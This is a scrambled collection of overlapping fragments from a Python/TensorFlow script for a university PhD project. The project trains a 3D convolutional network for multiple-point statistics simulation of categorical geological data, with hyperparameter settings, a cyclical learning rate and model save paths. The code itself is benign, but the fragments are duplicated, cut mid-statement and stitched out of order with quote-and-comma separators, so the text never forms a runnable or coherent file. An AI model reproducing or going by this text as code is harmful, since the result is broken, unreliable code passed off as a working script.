PointStart = 1 for indTrain in", "os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" #", "MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR", "# SGsizex - Num 0 HyperPar.append(50) # SGsizey - Num", "tensorflow as tf import time import External_Functions_3D as fns_nested import", "HyperPar.append(int(7)) # Search_z - Num 5 HyperPar.append(int(7)) # IPsizex -", "University as part of a PhD program. The code is", "the Version 1.0 of the RCNN approach to perform MPS", "MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7) start_time_1 = time.time() print", "- Num 8 HyperPar.append(50) # Percentage of Data Conditioning -", "1 for indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos =", "## ######################### import numpy as np import tensorflow as tf", "Percentage of Data Conditioning - Num 9 .. divided by", "= 250 Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel =", "start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s minutes of ALL training-\"", "The code is not free of bugs but running end-to-end.", "# convdepth - Num 13 HyperPar.append(2) # num of categories", "= fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR =", "fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01,", "recevied to: <EMAIL> April 16, 2019. Geomet Group - Queen's", "= 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]),", "= 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel)", "\", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch = 1 #Nbatch =", "# To save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False,", "- MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate = np.around(((MaxLR -", "TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))", "Num 8 HyperPar.append(50) # Percentage of Data Conditioning - Num", "8 HyperPar.append(50) # Percentage of Data Conditioning - Num 9", "approach to perform MPS in 3D for categorical variables. It", "Nepoch = 1 #Nbatch = 250 Nsamples = 512 TrainingImage", "improvements are well recevied to: <EMAIL> April 16, 2019. Geomet", "- cuos) + MaxLR, decimals=7) start_time_1 = time.time() print (\"Cicle:", "1.0 of the RCNN approach to perform MPS in 3D", "= 0.01, 0.001 StepLR = 10 PointStart = 1 for", "os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"", "HyperPar.append(50) # SGsizey - Num 1 HyperPar.append(50) # SGsizez -", "as part of a PhD program. The code is not", "HyperPar.append(2) # num of categories - Num 14 print(\"SG: \",", "9 .. divided by 3 so 1% is 10 represents", "are well recevied to: <EMAIL> April 16, 2019. Geomet Group", "is the Version 1.0 of the RCNN approach to perform", "#LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile =", "code is not free of bugs but running end-to-end. Any", "April 16, 2019. Geomet Group - Queen's University - Canada\"\"\"", "of Data Conditioning - Num 9 .. divided by 3", "TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR,", "TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR", "has been developed by <NAME> and <NAME> in the Geometallurygical", "as tf import time import External_Functions_3D as fns_nested import gc", "- Num 5 HyperPar.append(int(7)) # IPsizex - Num 6 HyperPar.append(int(7))", "= fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True)", "see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as np", "+ MaxLR, decimals=7) start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning", "# IPsizey - Num 7 HyperPar.append(int(7)) # IPsizez - Num", "12 HyperPar.append(16) # convdepth - Num 13 HyperPar.append(2) # num", "PointStart = 1 for indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10", "gc.collect() print(\" \") print(\"--%s minutes of ALL training-\" % ((time.time()", "#os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as np import tensorflow as", "5 HyperPar.append(int(7)) # IPsizex - Num 6 HyperPar.append(int(7)) # IPsizey", "in range(1): start_time_AllTrain = time.time() HyperPar = [] HyperPar.append(50) #", "int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch = 1", "import tensorflow as tf import time import External_Functions_3D as fns_nested", "512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]),", "Ncicles = 500 Nepoch = 1 #Nbatch = 250 Nsamples", "Num 0 HyperPar.append(50) # SGsizey - Num 1 HyperPar.append(50) #", "LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7)", "LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]),", "Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01, 0.001 StepLR", "int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch = 1 #Nbatch = 250", "time import External_Functions_3D as fns_nested import gc for ind0 in", "3 so 1% is 10 represents 1% HyperPar.append(1) # MinDC", "int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save", "is 10 represents 1% HyperPar.append(1) # MinDC - Num 10", "- Num 4 HyperPar.append(int(7)) # Search_z - Num 5 HyperPar.append(int(7))", "1% is 10 represents 1% HyperPar.append(1) # MinDC - Num", "# Do not display the AVX message about using GPU", "well recevied to: <EMAIL> April 16, 2019. Geomet Group -", "HyperPar.append(3) # wdnh - Num 12 HyperPar.append(16) # convdepth -", "Group - Queen's University - Canada\"\"\" # Do not display", "= 1 #Nbatch = 250 Nsamples = 512 TrainingImage =", "by 3 so 1% is 10 represents 1% HyperPar.append(1) #", "<NAME> and <NAME> in the Geometallurygical Group at Queen's University", "MinLR, decimals=7) else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos)", "int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To", "= np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos < StepLR: LearningRate", "part of a PhD program. The code is not free", "about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client", "to perform MPS in 3D for categorical variables. It has", "#152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as np import tensorflow", "14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500", "- Num 11 HyperPar.append(3) # wdnh - Num 12 HyperPar.append(16)", "16, 2019. Geomet Group - Queen's University - Canada\"\"\" #", "Any comments and further improvements are well recevied to: <EMAIL>", "= 500 Nepoch = 1 #Nbatch = 250 Nsamples =", "fns_nested import gc for ind0 in range(1): start_time_AllTrain = time.time()", "<EMAIL> April 16, 2019. Geomet Group - Queen's University -", "so 1% is 10 represents 1% HyperPar.append(1) # MinDC -", "MinDC - Num 10 HyperPar.append(1500) # Num Fully Connected -", "decimals=2))) gc.collect() print(\" \") print(\"--%s minutes of ALL training-\" %", "Geometallurygical Group at Queen's University as part of a PhD", "the Geometallurygical Group at Queen's University as part of a", "MPS in 3D for categorical variables. It has been developed", "print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch", "start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate)", "Num 2 HyperPar.append(int(7)) # Search_x - Num 3 HyperPar.append(int(7)) #", "SGsizey - Num 1 HyperPar.append(50) # SGsizez - Num 2", "end-to-end. Any comments and further improvements are well recevied to:", "HyperPar.append(int(7)) # IPsizey - Num 7 HyperPar.append(int(7)) # IPsizez -", "= time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid", "int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))", "np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate = np.around(((MaxLR", "in 3D for categorical variables. It has been developed by", "#HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos < StepLR:", "display the AVX message about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL']", "11 HyperPar.append(3) # wdnh - Num 12 HyperPar.append(16) # convdepth", "MaxLR, decimals=7) start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate:", "= \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel", "ind0 in range(1): start_time_AllTrain = time.time() HyperPar = [] HyperPar.append(50)", "indTrain%(2*StepLR) if cuos < StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos", "\"\"\"The present code is the Version 1.0 of the RCNN", "of bugs but running end-to-end. Any comments and further improvements", "Data Conditioning - Num 9 .. divided by 3 so", "0 HyperPar.append(50) # SGsizey - Num 1 HyperPar.append(50) # SGsizez", "range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos <", "time.time() HyperPar = [] HyperPar.append(50) # SGsizex - Num 0", "int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile =", "int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]),", "Search_z - Num 5 HyperPar.append(int(7)) # IPsizex - Num 6", "- Num 2 HyperPar.append(int(7)) # Search_x - Num 3 HyperPar.append(int(7))", "the AVX message about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] =", "MinLR = 0.01, 0.001 StepLR = 10 PointStart = 1", "HyperPar = [] HyperPar.append(50) # SGsizex - Num 0 HyperPar.append(50)", "- MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7) start_time_1 = time.time()", "= time.time() HyperPar = [] HyperPar.append(50) # SGsizex - Num", "if cuos < StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos +", "print(\" \") print(\"--%s minutes of ALL training-\" % ((time.time() -", "fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving", "Num 12 HyperPar.append(16) # convdepth - Num 13 HyperPar.append(2) #", ".. divided by 3 so 1% is 10 represents 1%", "Num 13 HyperPar.append(2) # num of categories - Num 14", "int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))", "Search_x - Num 3 HyperPar.append(int(7)) # Search_y - Num 4", "'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]),", "the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1)", "the RCNN approach to perform MPS in 3D for categorical", "(np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s minutes of", "in the Geometallurygical Group at Queen's University as part of", "TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole training process-\"", "TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01, 0.001 StepLR = 10", "running end-to-end. Any comments and further improvements are well recevied", "Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles =", "= 1 for indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos", "indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole", "< StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7)", "import gc for ind0 in range(1): start_time_AllTrain = time.time() HyperPar", "LocModel=LocModel) # To save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage,", "'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]),", "% (np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s minutes", "- Num 1 HyperPar.append(50) # SGsizez - Num 2 HyperPar.append(int(7))", "Num 7 HyperPar.append(int(7)) # IPsizez - Num 8 HyperPar.append(50) #", "time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid =", "is not free of bugs but running end-to-end. Any comments", "int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the", "present code is the Version 1.0 of the RCNN approach", "# wdnh - Num 12 HyperPar.append(16) # convdepth - Num", "2019. Geomet Group - Queen's University - Canada\"\"\" # Do", "= [] HyperPar.append(50) # SGsizex - Num 0 HyperPar.append(50) #", "Num 4 HyperPar.append(int(7)) # Search_z - Num 5 HyperPar.append(int(7)) #", "LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel,", "HyperPar.append(1500) # Num Fully Connected - Num 11 HyperPar.append(3) #", "# Search_x - Num 3 HyperPar.append(int(7)) # Search_y - Num", "as fns_nested import gc for ind0 in range(1): start_time_AllTrain =", "- Num 9 .. divided by 3 so 1% is", "HyperPar.append(int(7)) # IPsizex - Num 6 HyperPar.append(int(7)) # IPsizey -", "HyperPar.append(int(7)) # Search_x - Num 3 HyperPar.append(int(7)) # Search_y -", "\"Learning Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True,", "HyperPar.append(int(7)) # Search_y - Num 4 HyperPar.append(int(7)) # Search_z -", "#Nbatch = 250 Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel", "Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True)", "6 HyperPar.append(int(7)) # IPsizey - Num 7 HyperPar.append(int(7)) # IPsizez", "Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]),", "'2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue", "for indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR)", "Num 6 HyperPar.append(int(7)) # IPsizey - Num 7 HyperPar.append(int(7)) #", "0.01, 0.001 StepLR = 10 PointStart = 1 for indTrain", "Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01, 0.001 StepLR =", "\") print(\"--%s minutes of ALL training-\" % ((time.time() - start_time_AllTrain)/60))", "\", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\")", "free of bugs but running end-to-end. Any comments and further", "\"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel =", "- Queen's University - Canada\"\"\" # Do not display the", "To save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True)", "for categorical variables. It has been developed by <NAME> and", "variables. It has been developed by <NAME> and <NAME> in", "Num 3 HyperPar.append(int(7)) # Search_y - Num 4 HyperPar.append(int(7)) #", "# Search_y - Num 4 HyperPar.append(int(7)) # Search_z - Num", "3D for categorical variables. It has been developed by <NAME>", "Queen's University - Canada\"\"\" # Do not display the AVX", "further improvements are well recevied to: <EMAIL> April 16, 2019.", "Num 9 .. divided by 3 so 1% is 10", "10 PointStart = 1 for indTrain in range(Ncicles): #HyperPar[9] =", "SGsizex - Num 0 HyperPar.append(50) # SGsizey - Num 1", "cuos < StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR,", "int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\")", "and <NAME> in the Geometallurygical Group at Queen's University as", "tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"", "int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]),", "10 represents 1% HyperPar.append(1) # MinDC - Num 10 HyperPar.append(1500)", "int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) #", "num of categories - Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP:", "1 #Nbatch = 250 Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\"", "of the RCNN approach to perform MPS in 3D for", "int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))", "np import tensorflow as tf import time import External_Functions_3D as", "Do not display the AVX message about using GPU import", "message about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from", "- Num 13 HyperPar.append(2) # num of categories - Num", "HyperPar.append(int(7)) # IPsizez - Num 8 HyperPar.append(50) # Percentage of", "seconds of whole training process-\" % (np.around((time.time() - start_time_1), decimals=2)))", "StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7) else:", "import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices())", "DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01, 0.001", "save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png',", "# IPsizez - Num 8 HyperPar.append(50) # Percentage of Data", "- Num 0 HyperPar.append(50) # SGsizey - Num 1 HyperPar.append(50)", "int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), 